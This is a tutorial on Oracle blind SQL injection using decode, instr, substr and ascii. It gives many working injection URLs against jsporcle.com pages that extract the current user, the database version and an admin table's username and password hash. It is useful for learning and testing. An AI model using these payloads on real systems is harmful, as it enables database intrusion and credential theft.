0x01 Boolean-based blind injection with the decode function
decode(field_or_expression, value1, value2, value3)
The function returns value2 when the field (or an expression over it) equals value1, and value3 otherwise.
value1, value2 and value3 can themselves be expressions, which makes some SQL statements much simpler.
Usage:
Comparing two values
select decode(sign(var1-var2),-1,var1,var2) from dual; -- returns the smaller value
sign() returns 0, 1 or -1 depending on whether its argument is zero, positive or negative.
Example:
var1=10, var2=20
sign(var1-var2) returns -1, so decode resolves to var1, which yields the smaller of the two.
SQL> select decode(sign(10-20),-1,10,20) from dual;

DECODE(SIGN(10-20),-1,10,20)
----------------------------
                          10
Applying decode in an injection
Testing the current user
select decode(user,'SYSTEM',1,0) from dual;
Returns 1 if the current user is SYSTEM and 0 otherwise. USER is returned in upper case for normally created accounts, so the comparison string must be upper case too.
SQL> select decode(user,'SYSTEM',1,0) from dual;

DECODE(USER,'SYSTEM',1,0)
-------------------------
                        1

SQL> select decode(user,'SYS',1,0) from dual;

DECODE(USER,'SYS',1,0)
----------------------
                     0
Using decode for blind injection at an injection point
Checking whether the current user is SCOTT
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(user,'SCOTT',1,0) from dual) --
The current user can also be guessed one character at a time with substr()
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --
Only the queried content needs to be swapped in, so not every case is listed here. For example, to check whether the first character of the Oracle version string is O:
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual) --
Current user
(select user from dual)
Database version
(select banner from sys.v_$version where rownum=1)
Username and password from the admin table
(select username||password from admin)
Getting the string length
select length(user) from dual --
select * from art where id=1 and 6=(select length(user) from dual) --
http://www.jsporcle.com/news.jsp?id=1 and 6=(select length(user) from dual) --
Is the first character of the current user S? Returns 1 if so, 0 otherwise. Checking the six characters of SYSTEM position by position:
(select decode(substr(user,1,1),'S',1,0) from dual) --
(select decode(substr(user,2,1),'Y',1,0) from dual) --
(select decode(substr(user,3,1),'S',1,0) from dual) --
(select decode(substr(user,4,1),'T',1,0) from dual) --
(select decode(substr(user,5,1),'E',1,0) from dual) --
(select decode(substr(user,6,1),'M',1,0) from dual) --
Query for testing the current user
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --
Getting the username and password from the admin table
select * from art where id=1 and 1=(select decode(substr((select username||password from admin),1,1),'a',1,0) from dual)
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),1,1),'a',1,0) from dual)
In the URL the || concatenation operator must be percent-encoded as %7c%7c, otherwise the pipes are mangled before they reach the database.
Candidate character set for guessing
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.
Querying the second character
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),2,1),'d',1,0) from dual) --
Once the functions are understood, the rest is brute-forcing with a script; Burp Suite is one option.
0x02 Boolean-based blind injection with the instr function
instr returns the position of a substring within a string. For example:
SQL> select instr('abcdefgh','de') position from dual;

  POSITION
----------
         4
Positions start at 1; d is the fourth character, so the result is 4. If the substring is absent, instr returns 0.
Use in blind injection:
http://www.jsporcle.com/news.jsp?id=1 and 1=(instr((select user from dual),'SYS')) --
The condition is true only when 'SYS' is found at position 1, i.e. the user name starts with SYS (SYS or SYSTEM, for instance); a user name that merely contains SYS elsewhere gives a position other than 1.
Brute-force the user name with Burp
0x03 A generic blind method: character-by-character guessing
First get the data length
37=(select length(username||password) from admin)
Encoded test
http://www.jsporcle.com/news.jsp?id=1 and 37=(select length(username%7c%7cpassword) from admin)--
select * from art where id=1 and 37=(select length(username||password) from admin);
This subquery must return exactly one row. If admin holds more than one row, add a where clause or rownum=1; otherwise Oracle raises ORA-01427 (single-row subquery returns more than one row) and the condition is never true for any length.
Guessing the ASCII code
http://www.jsporcle.com/news.jsp?id=1 and (select ascii(substr(username%7c%7cpassword,1,1)) from admin)=97 --
Again, brute-force with Burp or a script. Comparing ascii() with > or < instead of = allows a binary search over the code range, about seven requests per character instead of one request per candidate.
Result: admine10adc3949ba59abbe56e057f20f883e, i.e. the username admin followed by the 32 hex characters of the password field, a stored MD5 digest (this particular value is the MD5 of 123456).